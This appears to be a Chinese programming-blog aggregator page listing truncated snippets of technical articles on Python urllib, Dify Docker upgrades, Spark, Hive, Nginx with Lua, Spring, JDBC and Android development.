Python从0到100（三十四）：Python中的urllib模块使用指南是Dream呀 python 开发语言
1.urllib模块概述在Python中，除了广泛使用的requests模块之外，urllib模块也是处理HTTP请求的重要工具。urllib模块在Python2中分为urllib和urllib2两个模块，而在Python3中，它们被合并为一个urllib模块。本文将重点介绍Python3中的urllib模块及其使用方法。2.urllib模块的基本方法介绍2.1urllib.request.url
dify重磅升级:从0.15.3安全升级1.1.0新手避坑指南 Ven% 简单说深度学习 docker实用 DIfy动手 dify docker python 人工智能
DockerCompose部署备份自定义的docker-composeYAML文件（可选）cddockercpdocker-compose.yamldocker-compose.yaml.-$(date+%Y-%m-%d-%H-%M).bak从main分支获取最新代码gitcheckoutmaingitpulloriginmain停止服务，命令，请在docker目录下执行
【优化选址】基于多目标遗传NSGAII、多目标免疫遗传算法求解考虑成本、救援时间和可靠性的海上救援选址多目标优化问题研究（Matlab代码实现）荔枝科研社 matlab 数据结构算法
欢迎来到本博客❤️❤️博主优势：博客内容尽量做到思维缜密，逻辑清晰，为了方便读者。⛳️座右铭：行百里者，半于九十。本文目录如下：目录⛳️赠与读者1概述基于多目标遗传NSGAII、多目标免疫遗传算法求解考虑成本、救援时间和可靠性的海上救援选址多目标优化问题研究一、引言二、海上救援选址多目标优化问题分析（一）成本因素（二）救援时间因素（三）可靠性因素三、多目标遗传NSGAII算法（一）算法原理（二）在
SparkSQL编程-RDD、DataFrame、DataSet 早拾碗吧 Spark spark hadoop 大数据 sparksql
三者之间的关系在SparkSQL中Spark为我们提供了两个新的抽象，分别是DataFrame和DataSet。他们和RDD有什么区别呢？首先从版本的产生上来看：RDD(Spark1.0)—>Dataframe(Spark1.3)—>Dataset(Spark1.6)如果同样的数据都给到这三个数据结构，他们分别计算之后，都会给出相同的结果。不同是的他们的执行效率和执行方式。在后期的Spark版本中
python 使用Nginx和uWSGI来运行Python应用 weixin_33738555 运维 python 操作系统
参考：http://zmrenwu.com/post/20/uWSGI是一个Web应用服务器，它具有应用服务器，代理，进程管理及应用监控等功能。它支持WSGI协议，同时它也支持自有的uWSGI协议，该协议据说性能非常高，而且内存占用率低，为mod_wsgi的一半左右，我没有实测过。它还支持多应用的管理及应用的性能监控。虽然uWSGI本身就可以直接用来当Web服务器，但一般建议将其作为应用服务器配合
qt读取数据库数据并验证_qt 数据库操作总结 NewbeeSmart qt读取数据库数据并验证
qt数据库操作总结整理一下QT操作数据库的一些要点，以备以后的查询学习(主要是操作mysql)。首先，要查询相关的驱动是否已经装好了，可以用以下的程序进行验证：#include#include#include#includeintmain(intargc,char*argv[]){QCoreApplicationa(argc,argv);qDebug()
如何基于Gone编写一个Goner对接Apollo配置中心（上）—— 实现统一管理配置和监控配置变化 dapeng-大鹏 Gone框架介绍 golang gone 配置中心微服务 Apollo
项目地址：https://github.com/gone-io/gone原文地址：https://github.com/gone-io/goner/blob/main/docs/build_goner.md本文介绍的例子，代码在：https://github.com/gone-io/goner/blob/main/apollo文章目录引言Gone框架与Goner组件简介Apollo配置中心简介编写
jdk tomcat 环境变量配置 Array_06 java jdk tomcat
Win7 下如何配置java环境变量 1。准备jdk包，win7系统，tomcat安装包（均上网下载即可） 2。进行对jdk的安装，尽量为默认路径（但要记住啊！！以防以后配置用。。。） 3。分别配置高级环境变量。电脑-->右击属性-->高级环境变量-->环境变量。分别配置 : path &nbs
Spring调SDK包报java.lang.NoSuchFieldError错误 bijian1013 java spring
在工作中调另一个系统的SDK包，出现如下java.lang.NoSuchFieldError错误。 org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.l
LeetCode[位运算] - #136 数组中的单一数 Cwind java 题解位运算 LeetCode Algorithm
原题链接：#136 Single Number 要求：给定一个整型数组，其中除了一个元素之外，每个元素都出现两次。找出这个元素注意：算法的时间复杂度应为O(n)，最好不使用额外的内存空间难度：中等分析：题目限定了线性的时间复杂度，同时不使用额外的空间，即要求只遍历数组一遍得出结果。由于异或运算 n XOR n = 0, n XOR 0 = n，故将数组中的每个元素进
qq登陆界面开发 15700786134 qq
今天我们来开发一个qq登陆界面，首先写一个界面程序，一个界面首先是一个Frame对象，即是一个窗体。然后在这个窗体上放置其他组件。代码如下： public class First { public void initul(){ jf=ne
Linux的程序包管理器RPM 被触发 linux
在早期我们使用源代码的方式来安装软件时，都需要先把源程序代码编译成可执行的二进制安装程序，然后进行安装。这就意味着每次安装软件都需要经过预处理-->编译-->汇编-->链接-->生成安装文件--> 安装，这个复杂而艰辛的过程。为简化安装步骤，便于广大用户的安装部署程序，程序提供商就在特定的系统上面编译好相关程序的安装文件并进行打包，提供给大家下载，我们只需要根据自己的
socket通信遇到EOFException 肆无忌惮_ EOFException
java.io.EOFException at java.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2281) at java.io.ObjectInputStream$BlockDataInputStream.readShort(ObjectInputStream.java:
基于spring的web项目定时操作知了ing java Web
废话不多说，直接上代码，很简单配置一下项目启动就行 1，web.xml <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="h
树形结构的数据库表Schema设计矮蛋蛋 schema
原文地址： http://blog.csdn.net/MONKEY_D_MENG/article/details/6647488 程序设计过程中，我们常常用树形结构来表征某些数据的关联关系，如企业上下级部门、栏目结构、商品分类等等，通常而言，这些树状结构需要借助于数据库完成持久化。然而目前的各种基于关系的数据库，都是以二维表的形式记录存储数据信息，
maven将jar包和源码一起打包到本地仓库 alleni123 maven
http://stackoverflow.com/questions/4031987/how-to-upload-sources-to-local-maven-repository <project> ... <build> <plugins> <plugin> <groupI
java IO操作与 File 获取文件或文件夹的大小，可读，等属性！！！百合不是茶
类 File File是指文件和目录路径名的抽象表示形式。 1，何为文件：标准文件（txt doc mp3...）目录文件（文件夹）虚拟内存文件 2，File类中有可以创建文件的 createNewFile（）方法,在创建新文件的时候需要try{} catch(）{}因为可能会抛出异常；也有可以判断文件是否是一个标准文件的方法isFile();这些防抖都
Spring注入有继承关系的类（2） bijian1013 java spring
被注入类的父类有相应的属性，Spring可以直接注入相应的属性，如下所例：1.AClass类 package com.bijian.spring.test4; public class AClass { private String a; private String b; public String getA() { retu
30岁转型期你能否成为成功人士 bijian1013 成长励志
很多人由于年轻时走了弯路，到了30岁一事无成，这样的例子大有人在。但同样也有一些人，整个职业生涯都发展得很优秀，到了30岁已经成为职场的精英阶层。由于做猎头的原因，我们接触很多30岁左右的经理人，发现他们在职业发展道路上往往有很多致命的问题。在30岁之前，他们的职业生涯表现很优秀，但从30岁到40岁这一段，很多人
【Velocity四】Velocity与Java互操作 bit1129 velocity
Velocity出现的目的用于简化基于MVC的web应用开发，用于替代JSP标签技术，那么Velocity如何访问Java代码.本篇继续以Velocity三http://bit1129.iteye.com/blog/2106142中的例子为基础， POJO package com.tom.servlets; public
【Hive十一】Hive数据倾斜优化 bit1129 hive
什么是Hive数据倾斜问题操作：join,group by,count distinct 现象：任务进度长时间维持在99%（或100%），查看任务监控页面，发现只有少量（1个或几个）reduce子任务未完成；查看未完成的子任务，可以看到本地读写数据量积累非常大，通常超过10GB可以认定为发生数据倾斜。原因：key分布不均匀倾斜度衡量：平均记录数超过50w且
在nginx中集成lua脚本：添加自定义Http头，封IP等 ronin47 nginx lua csrf
Lua是一个可以嵌入到Nginx配置文件中的动态脚本语言，从而可以在Nginx请求处理的任何阶段执行各种Lua代码。刚开始我们只是用Lua 把请求路由到后端服务器，但是它对我们架构的作用超出了我们的预期。下面就讲讲我们所做的工作。强制搜索引擎只索引mixlr.com Google把子域名当作完全独立的网站，我们不希望爬虫抓取子域名的页面，降低我们的Page rank。 location /{
java-3.求子数组的最大和 bylijinnan java
package beautyOfCoding; public class MaxSubArraySum { /** * 3.求子数组的最大和题目描述：输入一个整形数组，数组里有正数也有负数。数组中连续的一个或多个整数组成一个子数组，每个子数组都有一个和。求所有子数组的和的最大值。要求时间复杂度为O(n)。例如输入的数组为1, -2, 3, 10, -4,
Netty源码学习-FileRegion bylijinnan java netty
今天看org.jboss.netty.example.http.file.HttpStaticFileServerHandler.java 可以直接往channel里面写入一个FileRegion对象，而不需要相应的encoder： //pipeline（没有诸如“FileRegionEncoder”的handler）： public ChannelPipeline ge
使用ZeroClipboard解决跨浏览器复制到剪贴板的问题 cngolon 跨浏览器复制到粘贴板 Zero Clipboard
Zero Clipboard的实现原理 Zero Clipboard 利用透明的Flash让其漂浮在复制按钮之上，这样其实点击的不是按钮而是 Flash ，这样将需要的内容传入Flash，再通过Flash的复制功能把传入的内容复制到剪贴板。 Zero Clipboard的安装方法首先需要下载 Zero Clipboard的压缩包，解压后把文件夹中两个文件：ZeroClipboard.js
单例模式 cuishikuan 单例模式
第一种（懒汉，线程不安全）： public class Singleton { 2 private static Singleton instance; 3 pri
spring+websocket的使用 dalan_123
一、spring配置文件 <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.or
细节问题：ZEROFILL的用法范围。 dcj3sjt126com mysql
1、zerofill把月份中的一位数字比如1，2，3等加前导0 mysql> CREATE TABLE t1 (year YEAR(4), month INT(2) UNSIGNED ZEROFILL, -> day
Android开发10——Activity的跳转与传值 dcj3sjt126com Android开发
Activity跳转与传值，主要是通过Intent类，Intent的作用是激活组件和附带数据。一、Activity跳转方法一Intent intent = new Intent(A.this, B.class); startActivity(intent) 方法二Intent intent = new Intent();intent.setCla
jdbc 得到表结构、主键 eksliang jdbc 得到表结构、主键
转自博客：http://blog.csdn.net/ocean1010/article/details/7266042 假设有个con DatabaseMetaData dbmd = con.getMetaData(); rs = dbmd.getColumns(con.getCatalog(), schema, tableName, null); rs.getSt
Android 应用程序开关GPS gqdy365 android
要在应用程序中操作GPS开关需要权限： <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" /> 但在配置文件中添加此权限之后会报错，无法再eclipse里面正常编译，怎么办？ 1、方法一：将项目放到Android源码中编译； 2、方法二：网上有人说cl
Windows上调试MapReduce zhiquanliu mapreduce
1.下载hadoop2x-eclipse-plugin https://github.com/winghc/hadoop2x-eclipse-plugin.git 把 hadoop2.6.0-eclipse-plugin.jar 放到eclipse plugin 目录中。 2.下载 hadoop2.6_x64_.zip http://dl.iteye.com/topics/download/d2b
如何看待一些知名博客推广软文的行为？ justjavac 博客
本文来自我在知乎上的一个回答：http://www.zhihu.com/question/23431810/answer/24588621 互联网上的两种典型心态：当初求种像条狗，如今撸完嫌人丑当初搜贴像条犬，如今读完嫌人软你为啥感觉不舒服呢？难道非得要作者把自己的劳动成果免费给你用，你才舒服？就如同 Google 关闭了 Gooled Reader，那是
sql优化总结 macroli sql
为了是自己对sql优化有更好的原则性，在这里做一下总结，个人原则如有不对请多多指教。谢谢！要知道一个简单的sql语句执行效率，就要有查看方式，一遍更好的进行优化。一、简单的统计语句执行时间 declare @d datetime ---定义一个datetime的变量set @d=getdate() ---获取查询语句开始前的时间select user_id
Linux Oracle中常遇到的一些问题及命令总结超声波 oracle linux
1.linux更改主机名 (1)#hostname oracledb　　　　临时修改主机名 (2) vi /etc/sysconfig/network 　　修改hostname (3) vi /etc/hosts　　　　　　　　修改IP对应的主机名 2.linux重启oracle实例及监听的各种方法（注意操作的顺序应该是先监听，后数据库实例） &nbs
hive函数大全及使用示例 superlxw1234 hadoop hive函数
具体说明及示例参见附件文档。文档目录：目录一、关系运算： 4 1. 等值比较: = 4 2. 不等值比较: <> 4 3. 小于比较: < 4 4. 小于等于比较: <= 4 5. 大于比较: > 5 6. 大于等于比较: >= 5 7. 空值判断: IS NULL 5
Spring 4.2新特性-使用@Order调整配置类加载顺序 wiselyman spring 4
4.1 @Order Spring 4.2 利用@Order控制配置类的加载顺序 4.2 演示两个演示bean package com.wisely.spring4_2.order; public class Demo1Service { } package com.wisely.spring4_2.order; public class